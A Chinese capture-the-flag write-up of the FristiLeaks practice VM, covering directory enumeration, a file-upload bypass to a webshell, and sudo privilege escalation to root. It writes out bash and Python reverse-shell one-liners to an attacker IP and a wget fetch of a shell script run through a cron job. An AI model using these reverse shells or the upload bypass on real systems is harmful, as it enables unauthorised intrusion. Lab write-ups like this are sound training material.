Fristileaks 靶机,文件上传之getshell,sudo提权

admin
admin
admin
138405
文章
113
评论
2025年3月3日22:07:46评论7 views字数 2247阅读7分29秒阅读模式

端口扫描

Fristileaks 靶机,文件上传之getshell,sudo提权
image-20250302191201086

目录泄露 :/cola /sisi /beer

dirb目录扫描

Fristileaks 靶机,文件上传之getshell,sudo提权
image-20250302191515796

整合下思路:

发现五张图片,将他们下载到本地分析一下

发现可疑文字CDEFGHIJSTUVWXYZcdefghijstuvwxyz

发现图片上有“this is not url”

其他无发现,搜索网页也无新发现

目录拼接泄露

网页上写着keep.calm,drink,fristi四个字母,又发现拆解文字fristi+leaks,leaks意为泄露,故觉得fristi可能是子目录

Fristileaks 靶机,文件上传之getshell,sudo提权
image-20250302193739250

成功访问

登录框之账户密码泄露

尝试万能密码,sql注入均无果,查看源代码,发现一个信封

发信人为eezeepz

在源代码底部又发现一段注释代码,猜测为base64加密,保存下来,解密

vim base.txt 
base64 -d base.txt >base1.txt
cat base1.txt    

发现其为png格式,重新解码

vim base.png
base64 -d base.png >base1.png
cat base1.png    

在浏览器中查看

Fristileaks 靶机,文件上传之getshell,sudo提权
image-20250302194656610

字母为keKkeKKeKKeKkEkkEk,猜测为密码,尝试登录

登录成功

上传文件漏洞之getshell

只允许上传png,jpg,gif 类型,如果我们要上传php,就只能绕过。前端绕过不行,只能绕过。服务器经测试,存在Apache HTTPD多后缀解析漏洞

上传shell.php.jpg文件,内容为

上传后给出路径,直接访问http://192.168.213.170/fristi/uploads/shell5.php.jpg   可以直接访问,蚁剑连接,反弹shell

/bin/bash -i >& /dev/tcp/192.168.213.154/88880>&1

美化终端

python -c 'import pty;pty.spawn("/bin/bash")'

也可以不用蚁剑,直接在浏览器中执行

cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.213.154",4445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'

解释:
这是一个用于建立反向 shell 的简单 Python 脚本。它通过重定向标准输入、输出和错误,以及启动一个交互式 shell,实现了远程控制目标机器的功能。 
Fristileaks 靶机,文件上传之getshell,sudo提权
image-20250302201948803

提权

内核信息不多,无法利用内核漏洞提权

在根目录下发现notes.txt文件,有这样一段话

hey eezeepz your homedir is a mess, go clean it up, just dont delete the important stuff.    那我们去访问该目录,用户eezeepz

下面也有notes.txt,

提示:只需要在/tmp/目录下放一个名为“runthis”的文件,每行一个命令。输出到/tmp/目录下的“cronresult”文件。它应该以我的帐户权限每分钟运行一次

猜测其跟定时任务一样,我们可以继续反弹shell

wget http://192.168.213.154:4444/shell3.py
echo '/usr/bin/python /tmp/shell3.py' > runthis
kali:
nc -lvvp 4444
Fristileaks 靶机,文件上传之getshell,sudo提权
image-20250302203917294

成功反弹admin用户

查看当前目录下文件

Fristileaks 靶机,文件上传之getshell,sudo提权
image-20250302204217439

两个加密的数据

mVGZ3O3omkJLmy2pcuTq

=RFn0AKnlMHMPIzpyuTI0ITG

一个加密的文件,一个定时任务文件

我们编写解密文件

import base64, codecs, sys

def decodeString(encoded_str):
try:
return base64.b64decode(codecs.decode(encoded_str, 'rot13')[::-1]).decode('utf-8')
    except:
return None

if __name__ == "__main__":
if len(sys.argv) == 2:
        print(decodeString(sys.argv[1]))

分别解密

thisisalsopw123    LetThereBeFristi!

我们可以用密码 LetThereBeFristi!登上用户fristigod

查看历史  history

Fristileaks 靶机,文件上传之getshell,sudo提权
image-20250302210039347

有历史提权命令

Fristileaks 靶机,文件上传之getshell,sudo提权
image-20250302210738545

那么就可以构造一个开启root权限的shell终端的命令

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
Fristileaks 靶机,文件上传之getshell,sudo提权
image-20250302211603462

成功获取flag

原文始发于微信公众号(泷羽Sec-山然):Fristileaks 靶机,文件上传之getshell,sudo提权

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月3日22:07:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Fristileaks 靶机,文件上传之getshell,sudo提权https://cn-sec.com/archives/3791538.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息